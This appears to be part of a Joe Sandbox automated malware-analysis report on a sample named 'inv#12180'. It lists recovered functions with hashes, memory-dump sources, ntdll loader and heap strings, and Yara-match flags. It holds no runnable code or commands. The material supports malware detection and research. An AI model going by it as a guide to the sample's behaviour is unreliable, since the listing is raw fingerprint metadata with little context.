                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                • API String ID: 0-617086771
                                                • Opcode ID: 3b807b2ce08a61cc7add5acff34580a6d0089627ba4d6f89aa31aac0d61decb4
                                                • Instruction ID: d458bf333d4fb28495021f075df66acf45c5a3e4902166d02ee6dbffa5804320
                                                • Opcode Fuzzy Hash: 3b807b2ce08a61cc7add5acff34580a6d0089627ba4d6f89aa31aac0d61decb4
                                                • Instruction Fuzzy Hash: 3692CC71A042499FDB25CF68C440BEEBBF1FF48300F18845AE899AB362D774A946DF50
                                                Function 014F02C0 Relevance: 4.4, Strings: 3, Instructions: 611COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: """"$MitigationAuditOptions$MitigationOptions
                                                • API String ID: 0-1670051934
                                                • Opcode ID: b0fcfae25e546f54ba8b5d365bbf02bbaa8149bcb44121c257764898e1899273
                                                • Instruction ID: 25cc75f7cedcc64a863f792109a797c995e1f890a2da33d64d951c8c7a3a5a9d
                                                • Opcode Fuzzy Hash: b0fcfae25e546f54ba8b5d365bbf02bbaa8149bcb44121c257764898e1899273
                                                • Instruction Fuzzy Hash: 9D226CB26047028FE724CF2DC95162BFBE2BBD4210F25892FF29A87762D771E5458B41
                                                Function 01470770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-4253913091
                                                • Opcode ID: c1eb7e5fdec4fb23c28504a1856a7a4109bcea9f1a7831cdefb2926a1da89389
                                                • Instruction ID: 307b3bc226a0fb75bb14093017900f282a8ef2d6a6c99f30efa2a49905f28a25
                                                • Opcode Fuzzy Hash: c1eb7e5fdec4fb23c28504a1856a7a4109bcea9f1a7831cdefb2926a1da89389
                                                • Instruction Fuzzy Hash: B5F1BC74B01606DFEB25CF68C884BAAB7F5FF85700F14816AE4169B3A1D730E981CB90
                                                Function 01461460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                Download Yara Rule
                                                Strings
                                                • HEAP: , xrefs: 01461596
                                                • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01461728
                                                • HEAP[%wZ]: , xrefs: 01461712
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-3178619729
                                                • Opcode ID: ff5fb86fc569a048b67d0d95942f019076fbef8b37a54ed1145b811906e3a6bc
                                                • Instruction ID: f0785f6646832b65041de3f36efe768f5c9104088c8e4366854f33288cbb6edc
                                                • Opcode Fuzzy Hash: ff5fb86fc569a048b67d0d95942f019076fbef8b37a54ed1145b811906e3a6bc
                                                • Instruction Fuzzy Hash: 1BE1E230A042459FDB15CF28C491BBABBF9AF84708F18845FE99ACB366D734E845CB51
                                                Function 008F28C0 Relevance: 4.0, Strings: 3, Instructions: 247COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2501936553.00000000008F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000000.00000002.2501909320.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_8f0000_inv#12180.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: VUUU$gfff$gfff
                                                • API String ID: 0-2692852535
                                                • Opcode ID: 90a3d1a390ccdba9cb850613ca48483cd9d3c32c24ce4faa76b5733c88307f95
                                                • Instruction ID: 78b8cd417e45f97fa6261d6e13916faa0870fd8c7a2ad829f219eb5822bfcb07
                                                • Opcode Fuzzy Hash: 90a3d1a390ccdba9cb850613ca48483cd9d3c32c24ce4faa76b5733c88307f95
                                                • Instruction Fuzzy Hash: 6F611672B0012D4BDB28C97DEC80BB9B759F7D0325F28827AEE05DF281E5219D1586D1
                                                Function 01486962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $@
                                                • API String ID: 0-1077428164
                                                • Opcode ID: 7d8b54ee55c8988c56df93a9e0d2bc7e197a661c5e27f2e82b2a58a14950f259
                                                • Instruction ID: 3aa8d9b0d19ae407998043c8ee4693d2c5597a4cbfadff9c5079bea46e45bbc8
                                                • Opcode Fuzzy Hash: 7d8b54ee55c8988c56df93a9e0d2bc7e197a661c5e27f2e82b2a58a14950f259
                                                • Instruction Fuzzy Hash: 0AC2BF716083418FE765DF29C890BAFBBE5AF88714F14892EE989C7361D734D805CB52
                                                Function 0145A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: FilterFullPath$UseFilter$\??\
                                                • API String ID: 0-2779062949
                                                • Opcode ID: 17d0283b07ac289fa61c4d2e84fc82a95931c8fbb9029b4f73566096a072a67d
                                                • Instruction ID: 582363d74c3faa4e0eef2aeb897395c9e3e5e77a0dff451b48714c1242b2729c
                                                • Opcode Fuzzy Hash: 17d0283b07ac289fa61c4d2e84fc82a95931c8fbb9029b4f73566096a072a67d
                                                • Instruction Fuzzy Hash: 9BA159719112299BDB319F28CCC8BEAB7B8EF54710F1101EAE908A7261D7759F85CF60
                                                Function 01480BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                Download Yara Rule
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 014CA121
                                                • Failed to allocated memory for shimmed module list, xrefs: 014CA10F
                                                • LdrpCheckModule, xrefs: 014CA117
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-161242083
                                                • Opcode ID: 4806951fdebd6c15086aaf6fcc42a218d7c4eb7551eb5b06aae40551ecadb33e
                                                • Instruction ID: 9227164e77e59a1cbe3292737dab10680ec25a0a60539aae7457cdf0769a3402
                                                • Opcode Fuzzy Hash: 4806951fdebd6c15086aaf6fcc42a218d7c4eb7551eb5b06aae40551ecadb33e
                                                • Instruction Fuzzy Hash: 3571E375A10306DFDB29EF69C950AAEB7F4FB54704F15402EE412AB321E734AD4ACB40
                                                Function 01470A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-1334570610
                                                • Opcode ID: 38455394ee8cd7a9f30e6f59debd5729bce6fb8ace73fc239624d167f3d6295b
                                                • Instruction ID: b1c39900deb5eaee38edc07ea4616ad0ba0e42b99b90087af66c5f1693464a8c
                                                • Opcode Fuzzy Hash: 38455394ee8cd7a9f30e6f59debd5729bce6fb8ace73fc239624d167f3d6295b
                                                • Instruction Fuzzy Hash: 2861AC716013029FDB29DF68C480BAABBE1FF56704F14855EE8598F3A2D770E981CB91
                                                Function 008F28BC Relevance: 3.9, Strings: 3, Instructions: 182COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2501936553.00000000008F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000000.00000002.2501909320.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_8f0000_inv#12180.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: VUUU$gfff$gfff
                                                • API String ID: 0-2692852535
                                                • Opcode ID: 8867235c0f5ba284f38602b2c53568d56e68d44a0c28c687ab8cfd94fe343a5d
                                                • Instruction ID: e7534c76c068ec3e46075b3dacefbd460b9686cdf4b47db05bf87c7f92d1f625
                                                • Opcode Fuzzy Hash: 8867235c0f5ba284f38602b2c53568d56e68d44a0c28c687ab8cfd94fe343a5d
                                                • Instruction Fuzzy Hash: ED514872B0012D0BEB2CC97DEC81AB97A59F7D0314F28823AEE45DF2D1F5209E148691
                                                Function 0151C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                Download Yara Rule
                                                Strings
                                                • PreferredUILanguages, xrefs: 0151C212
                                                • @, xrefs: 0151C1F1
                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0151C1C5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                • API String ID: 0-2968386058
                                                • Opcode ID: 5eaa0a751e0a127a7fb3b7287ba58d7ce634024655cdb1c282e1d6a26efdae16
                                                • Instruction ID: da2fe7ff5e2cfe9ec3075fa52d03c700e1728766eba8ece95f8189165d0aadcd
                                                • Opcode Fuzzy Hash: 5eaa0a751e0a127a7fb3b7287ba58d7ce634024655cdb1c282e1d6a26efdae16
                                                • Instruction Fuzzy Hash: 9E419571D40209EBEF12DFD9C881FEEB7B8BB24700F14406AE659BB254D7759A44CB50
                                                Function 014F4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                • API String ID: 0-1373925480
                                                • Opcode ID: b89530f8d9485440ff6d9534e37fab28ab1df73ec79696b15f190d9ccb90aa38
                                                • Instruction ID: 46b42eff0547f4737d852aa8662b9847794d86a3e2d27c55d0e8d4ff03ce1148
                                                • Opcode Fuzzy Hash: b89530f8d9485440ff6d9534e37fab28ab1df73ec79696b15f190d9ccb90aa38
                                                • Instruction Fuzzy Hash: 2D41D471A006598BEB25DBD9C944BAEBBB4FF65340F19046FDA01EB7A1DB348902CB11
                                                Function 014E4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                Strings
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 014E4899
                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 014E4888
                                                • LdrpCheckRedirection, xrefs: 014E488F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 0-3154609507
                                                • Opcode ID: 437753cfb9cd3b136e8b892cc8eb0bfa3527d3e575f371a3522c18b4e96a9ecc
                                                • Instruction ID: d32a3bb072e1d3d248404866fd18230d38c7d4185ca16f51b02a2013e41db71d
                                                • Opcode Fuzzy Hash: 437753cfb9cd3b136e8b892cc8eb0bfa3527d3e575f371a3522c18b4e96a9ecc
                                                • Instruction Fuzzy Hash: DF41CF36A003518BCB21CE69D848A277BE5BF89652F0A055FED98DB371D330D800CB81
                                                Function 01470BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-2558761708
                                                • Opcode ID: 5be0a5723972678ab70762410ae9d0f61c8a8213510b80a37eda0e9af23abb26
                                                • Instruction ID: 1ca14e0ebe93759f88e13986021a183b5d31496963942da3505ac5e9956e97d4
                                                • Opcode Fuzzy Hash: 5be0a5723972678ab70762410ae9d0f61c8a8213510b80a37eda0e9af23abb26
                                                • Instruction Fuzzy Hash: 0A119D313161429FDB69CA19C451BBAF3A5EF52A15F28816FF806CF272DB30E841C755
                                                Function 014E20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                Download Yara Rule
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 014E2104
                                                • LdrpInitializationFailure, xrefs: 014E20FA
                                                • Process initialization failed with status 0x%08lx, xrefs: 014E20F3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2986994758
                                                • Opcode ID: 595dd4ea8d828d5a957c3ac1c2ae731c50f346239938ff254ed2491459d461d9
                                                • Instruction ID: 77dfc639eb61840be742957b160625ee45ffba843e8fcb319dd6c174f9300d9b
                                                • Opcode Fuzzy Hash: 595dd4ea8d828d5a957c3ac1c2ae731c50f346239938ff254ed2491459d461d9
                                                • Instruction Fuzzy Hash: 19F02834A403097BF720D60DDC16F9A7BACEB50B85F11001FF6047B3A1D2F0A640CA41
                                                Function 014703E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: #%u
                                                • API String ID: 48624451-232158463
                                                • Opcode ID: 51d0aff29c08f0d56c1849191495afd21fbc592e6049dfba7c4ad0ff02c42bd8
                                                • Instruction ID: 3483a51973657cc275b1deec4301fd9380cf80aca7550ef2505466378a0c0017
                                                • Opcode Fuzzy Hash: 51d0aff29c08f0d56c1849191495afd21fbc592e6049dfba7c4ad0ff02c42bd8
                                                • Instruction Fuzzy Hash: 1D712C71A0014A9FDB01DFA9D994FAEB7F8BF18704F15406AE905E7261EB34ED01CBA1
                                                Function 014752A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@
                                                • API String ID: 0-149943524
                                                • Opcode ID: 14e05070f85827850b37346267132474407d2f2e64664de6e496e61f4ddb6d50
                                                • Instruction ID: f4d1a48c5617b8d8909d703e0aa2945f901701e4e4be7c37ee4efddad05b4734
                                                • Opcode Fuzzy Hash: 14e05070f85827850b37346267132474407d2f2e64664de6e496e61f4ddb6d50
                                                • Instruction Fuzzy Hash: 9C328A745083518BD7648F19C580BBBBBE1AF84B50F15892FEA899F3B0E734D845CB92
                                                Function 0146A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                Download Yara Rule
                                                Strings
                                                • LdrResSearchResource Exit, xrefs: 0146AA25
                                                • LdrResSearchResource Enter, xrefs: 0146AA13
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                • API String ID: 0-4066393604
                                                • Opcode ID: 26ca7037869637cf579b52a70da960c5d38e8cc1532e24bf983b3fb03c3037e1
                                                • Instruction ID: 8aa5ee668ca447103fd2661209d498735ff0f869af5c1a050283e3f279e95652
                                                • Opcode Fuzzy Hash: 26ca7037869637cf579b52a70da960c5d38e8cc1532e24bf983b3fb03c3037e1
                                                • Instruction Fuzzy Hash: 9DE19275A006099FEF21CF99C940BAEBBB9FF54718F20442BEA01E7361D7749941CB51
                                                Function 01462FC8 Relevance: 2.9, Strings: 2, Instructions: 410COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @4Cw@4Cw$PATH
                                                • API String ID: 0-1794901795
                                                • Opcode ID: 3c9845723381db0e20294806f1937e761f5b9cd637be5941ea665e1075a72a08
                                                • Instruction ID: 19bc07e852c56eb4b1d4c74c44e68b48e67cd936fc75ce9e6b07a0540d5f0c69
                                                • Opcode Fuzzy Hash: 3c9845723381db0e20294806f1937e761f5b9cd637be5941ea665e1075a72a08
                                                • Instruction Fuzzy Hash: 67F1E271D00295DBCB25CF9DD880AFEBBB9FF58714F45402AE909AB360D734A941CB62
                                                Function 0152A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: `$`
                                                • API String ID: 0-197956300
                                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                • Instruction ID: dadb004db33c60d77cc1e718a873d0540623437edae0ea202135fddb3de6c473
                                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                • Instruction Fuzzy Hash: B4C1BF322043529BEB25CF28C840B6BBBE5BFD5318F084A2DF6968B6D0D774E505CB91
                                                Function 01460CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                Download Yara Rule
                                                Strings
                                                • Failed to retrieve service checksum., xrefs: 014BEE56
                                                • ResIdCount less than 2., xrefs: 014BEEC9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                • API String ID: 0-863616075
                                                • Opcode ID: 8686f790a0ac4aa1e7056b736971d9fd51fe93a4bed975307de7bda23601ca9b
                                                • Instruction ID: fe6c1f1d1cc134947d12b9b8bc1d50ebf4b313b8969fc5f61e77f43f0666822a
                                                • Opcode Fuzzy Hash: 8686f790a0ac4aa1e7056b736971d9fd51fe93a4bed975307de7bda23601ca9b
                                                • Instruction Fuzzy Hash: 23E102B19083849FE364CF15C080BABBBE4BB98714F408A2FE59D9B351D7719909CF56
                                                Function 014DE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Legacy$UEFI
                                                • API String ID: 2994545307-634100481
                                                • Opcode ID: 2d8097c051b6dca387dec3bf018b003346f1bb848576889840f83636ab6db809
                                                • Instruction ID: c0e6dc9e2745c44c3aafe2b7fd5b0feddb4d63a9d8d216aab8411bd792ed35c9
                                                • Opcode Fuzzy Hash: 2d8097c051b6dca387dec3bf018b003346f1bb848576889840f83636ab6db809
                                                • Instruction Fuzzy Hash: 1E617D71E002099FDF24DFA9C951BAEBBB9FB54700F64402EE649EB2A1D731E901CB50
                                                Function 015043D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$MUI
                                                • API String ID: 0-17815947
                                                • Opcode ID: f63e35693f8aa99945f8190b20a0958ace63c2de6c54c88a37f4936034f7c083
                                                • Instruction ID: 7639de1552f6ecd6dd7fc3b109e5f1b8448360182d6b4f263878171b70cf9416
                                                • Opcode Fuzzy Hash: f63e35693f8aa99945f8190b20a0958ace63c2de6c54c88a37f4936034f7c083
                                                • Instruction Fuzzy Hash: D8510971D0021DAFDB11DFE9CC90EEEBBB8BB54654F11052AE611BB290D671AA058B60
                                                Function 014604E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                Download Yara Rule
                                                Strings
                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0146063D
                                                • kLsE, xrefs: 01460540
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                • API String ID: 0-2547482624
                                                • Opcode ID: afb3d875157bab27febb66f4496c5c741b20847755f420d5938f732c714e5b28
                                                • Instruction ID: b0e8746100652d5d7c167b14454df6cead2b63e50485dabcf3512d8baacb23bd
                                                • Opcode Fuzzy Hash: afb3d875157bab27febb66f4496c5c741b20847755f420d5938f732c714e5b28
                                                • Instruction Fuzzy Hash: 2A51D1715007428FD724DF29C4406A7BBE8AF84308F10483FF6AA87361E774D945CB92
                                                Function 0146A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                Download Yara Rule
                                                Strings
                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 0146A309
                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 0146A2FB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                • API String ID: 0-2876891731
                                                • Opcode ID: 947e8007cc9534dd7074e6423c9767e9846d5d6216457de46b443d08b0b33ee4
                                                • Instruction ID: f17155aaa4b424ca781dc94e961675479e782cc4ef88dc79af3841f3761cf093
                                                • Opcode Fuzzy Hash: 947e8007cc9534dd7074e6423c9767e9846d5d6216457de46b443d08b0b33ee4
                                                • Instruction Fuzzy Hash: 6B41AF34A04A55DBDB11CF59C440B6A7BB8FF95704F24406BE900EB371E3B5D981CB52
                                                Function 0149A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Cleanup Group$Threadpool!
                                                • API String ID: 2994545307-4008356553
                                                • Opcode ID: 0b3a2cefa74130a47733ec5dce465691c141eb688d751ed0471e2d8525d2a930
                                                • Instruction ID: 597e75829df632e95419b4e7a4fac3e87af95118614bf9122d593ffb07bf1d64
                                                • Opcode Fuzzy Hash: 0b3a2cefa74130a47733ec5dce465691c141eb688d751ed0471e2d8525d2a930
                                                • Instruction Fuzzy Hash: F101D1B2240744AFD311DF14CD45F267BE8EB94716F05893AA69CCB1A0E374D804DB86
                                                Function 0146C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: MUI
                                                • API String ID: 0-1339004836
                                                • Opcode ID: 2d76c5c85b5521b2c8a582d4df26ba17749b7503b45dd7df1b0bc6bbfc62b6a6
                                                • Instruction ID: 04aab5fcb8fd760ac8dad565e3bfb2f913fc36305bbfeafcaf1c07351ce3f000
                                                • Opcode Fuzzy Hash: 2d76c5c85b5521b2c8a582d4df26ba17749b7503b45dd7df1b0bc6bbfc62b6a6
                                                • Instruction Fuzzy Hash: 3D826075E002189FDB24CFA9C8807EEBBB9BF44718F14816BD999AB361D7309D41CB51
                                                Function 014B2F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: P`1wRb1w
                                                • API String ID: 0-487437271
                                                • Opcode ID: ad5e54ba64512906d3cf96466c4cd254175802358ebe98a60e1cd593343660dd
                                                • Instruction ID: 62381a86fa5350680be5f6a8e91540d9cefba28caa5cbd26017a4c73dbbdf6c4
                                                • Opcode Fuzzy Hash: ad5e54ba64512906d3cf96466c4cd254175802358ebe98a60e1cd593343660dd
                                                • Instruction Fuzzy Hash: 5942E375D0425AAAEF29CF6ED8C46FEBBB0BF15310F14802BE545AB3A0D6749981C770
                                                Function 0150CD1F Relevance: 1.9, Strings: 1, Instructions: 620COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                • Instruction ID: f4c5c76868499ff5557ed80cac08d7cbf4aaa6074c730552bb6d10c21b867f3c
